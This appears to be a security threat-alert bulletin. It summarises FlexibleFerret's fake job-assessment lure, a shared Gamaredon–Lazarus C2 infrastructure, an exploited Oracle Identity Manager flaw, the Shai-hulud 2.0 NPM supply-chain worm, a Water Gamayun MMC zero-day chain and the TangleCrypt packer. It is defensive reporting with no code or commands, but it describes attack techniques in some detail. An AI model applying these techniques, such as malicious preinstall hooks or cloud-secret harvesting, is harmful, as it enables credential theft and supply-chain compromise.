Threat Alerts

A sophisticated social engineering campaign attributed to North Korean operators is actively targeting Apple users through fraudulent job recruitment websites. The threat, known as FlexibleFerret, represents an evolution of the Contagious Interview campaign that has persisted throughout 2025. This malware operation delivers credential-stealing backdoors and provides attackers with unauthorized system access, posing significant risks to individuals seeking employment opportunities.

The attack begins when job seekers visit convincing fake hiring assessment websites where they complete fraudulent job applications and assessments. Victims provide personal information and may even record video introductions as part of the application process. The critical moment occurs when applicants receive instructions to execute a Terminal command, which attackers claim is necessary to resolve camera or microphone access issues. Once executed, the initial command downloads a shell script that identifies the victim’s Mac architecture and retrieves the appropriate second-stage payload. The script establishes working directories in temporary locations, creates persistence mechanisms through LaunchAgents that automatically launch at login, and displays a fake application that mimics a legitimate password prompt to capture user credentials.

The final stage activates a Golang backdoor that establishes communication with command-and-control infrastructure. This component supports multiple malicious operations including system information collection, file upload and download capabilities, command execution, browser profile theft, and automated credential harvesting. The backdoor maintains persistence through system entries and includes error-handling mechanisms designed to reset the malware if temporary failures occur. The multi-stage delivery process remains largely hidden from users, with captured credentials transmitted to attacker-controlled accounts. This campaign demonstrates the continued effectiveness of social engineering tactics that exploit job seekers’ trust in recruitment processes.

Recent analysis identified a rare overlap in command-and-control infrastructure between Russia-aligned Gamaredon, a fast-moving cyber-espionage group known for high-volume phishing and rapid intrusions, and North Korea’s Lazarus Group, a highly resourced actor specializing in financial theft and supply-chain compromise.
The shared C2 assets indicate coordinated deployment logistics or deliberate resource sharing that allows both groups to obscure attribution and reuse infrastructure across separate campaigns.
Such cross-nation APT cooperation is extremely uncommon and points to a potential shift toward more aligned or complementary operations among major state-sponsored actors.

CISA has added a critical Oracle Fusion Middleware vulnerability to its Known Exploited Vulnerabilities catalog. CVE-2025-61757 (CVSS Score 9.8) represents a missing authentication flaw that enables complete system takeover through pre-authenticated remote code execution.

The vulnerability affects Oracle Identity Manager, allowing unauthenticated attackers with HTTP network access to compromise the REST WebServices component. The flaw requires no authentication and is easily exploitable, enabling attackers to achieve full system control through the Identity Manager interface. Honeypot analysis revealed active exploitation attempts between August and September 2025, with multiple HTTP POST requests targeting the vulnerable endpoint using 556-byte payloads. The attacks originated from different IP addresses but shared identical user agents, indicating coordinated exploitation efforts that preceded Oracle’s patch release.

A sophisticated malware campaign known as Shai-hulud 2.0 has emerged as a major threat to cloud infrastructure and software supply chains, expanding on its predecessor with enhanced backdoor functions and automated propagation capabilities. The malware systematically steals credentials from AWS, GCP, Azure, NPM, and GitHub while introducing a highly dangerous feature that automatically backdoors all NPM packages maintained by compromised developers. This creates an exponentially spreading supply chain threat capable of impacting thousands of downstream users, making Shai-hulud 2.0 one of the most concerning ecosystem-wide compromise mechanisms observed in recent months.

Technical analysis shows the attack begins with a malicious NPM package containing a preinstall script that executes on installation, deploying a Bun JavaScript runtime and avoiding detection through the use of official platform-specific installers. The malware behaves differently across developer machines and CI/CD environments, executing immediately in pipelines for maximum credential exposure while running as detached background processes on local systems. Persistence is achieved through privilege escalation on Linux leveraging Docker’s privileged access, disabling DNS and firewall protections, and harvesting credentials from NPM configs, cloud environment variables, and AWS ECS/EKS metadata endpoints. Shai-hulud 2.0 further abuses cloud-native secret management platforms by accessing AWS Secrets Manager across 17 regions, GCP Secret Manager across all reachable projects, and Azure Key Vault. Its command-and-control system relies on attacker-created GitHub repositories, self-hosted runners, and malicious workflows that trigger via discussion posts to execute remote commands. The malware exfiltrates data using structured JSON files after scanning entire home directories with TruffleHog, and its most dangerous capability is the automated supply chain backdooring: identifying all packages maintained by the victim, injecting malicious preinstall hooks into their tarballs, and republishing them at scale processing up to 100 packages concurrently to rapidly propagate across the NPM ecosystem.

A sophisticated multi-stage attack campaign targeting enterprise and government networks has been uncovered, attributed to the Russia-aligned Water Gamayun APT group. The operation begins with benign-looking web searches that lead victims to compromised legitimate websites and malicious lookalike domains, ultimately resulting in credential theft, backdoor deployment and long-term intelligence collection. The campaign showcases advanced tradecraft, including the exploitation of Windows zero-day vulnerabilities, layered obfuscation and strong operational security to evade detection and maintain persistence across targeted environments.

Analysis shows the infection chain starts when victims land on compromised sites that redirect them to malicious archives disguised with double extensions to appear as PDFs while containing MSC snap-ins exploiting CVE-2025-26633 in Windows MMC’s multilingual path resolution. Executed MSC files use TaskPad commands to trigger encoded PowerShell payloads that retrieve additional tools and password-protected archives, relying on multiple obfuscation layers such as nested Base64, UTF-16LE encoding, and runtime string manipulation. The actors hide execution windows using a custom compiled class while showing decoy documents to avoid suspicion. The infrastructure uses randomized path prefixes and strong 21-character archive passwords to hinder sandboxing with repeated payload execution to establish persistence and likely deploy malware families aligned with the group’s toolkit, including EncryptHub, SilentPrism, DarkWisp and Rhadamanthys. Attribution to Water Gamayun is supported by unique exploitation of the MSC flaw, recognizable PowerShell obfuscation patterns, Win32 API–based process hiding, dual-path infrastructure and social engineering themes consistent with prior operations, highlighting their continued evolution in using trusted-binary proxy execution and zero-day exploits for strategic data exfiltration.

Researchers have documented a new Windows malware packer dubbed TangleCrypt, first observed in a September 2025 intrusion where Qilin ransomware operators deployed the STONESTOP EDR killer alongside the malicious ABYSSWORKER kernel driver. TangleCrypt wraps payloads inside PE resources using multiple layers of base64 encoding, LZ78 compression, and XOR encryption, then decrypts and loads the original executable at runtime. It supports flexible execution methods, either injecting the decrypted payload into the current process or into a newly spawned child process, controlled via a configuration string embedded at the end of the payload. Although most samples seen so far carry STONESTOP, the packer is payload agnostic and has also been found protecting other malware such as XWorm.

To hinder analysis, TangleCrypt employs string encryption, dynamic API resolution, and slightly noisy anti analysis tricks such as deliberate access violations and unoptimized, bloated code. However, its protections are relatively weak and can be bypassed with standard debugging techniques, making manual unpacking straightforward once analysts hook key APIs like VirtualAlloc or WriteProcessMemory. Notably, the loader’s design contains implementation flaws, including discarding original TLS information and reimplementing CRT functions like _getmainargs incompletely, which can leave runtime structures uninitialized and cause crashes when the packed payload is run without elevated privileges. These bugs likely limit its reliability in the wild, but TangleCrypt still represents a flexible and evolving tool for threat actors who want to cloak EDR killers and other high impact payloads in targeted ransomware operations.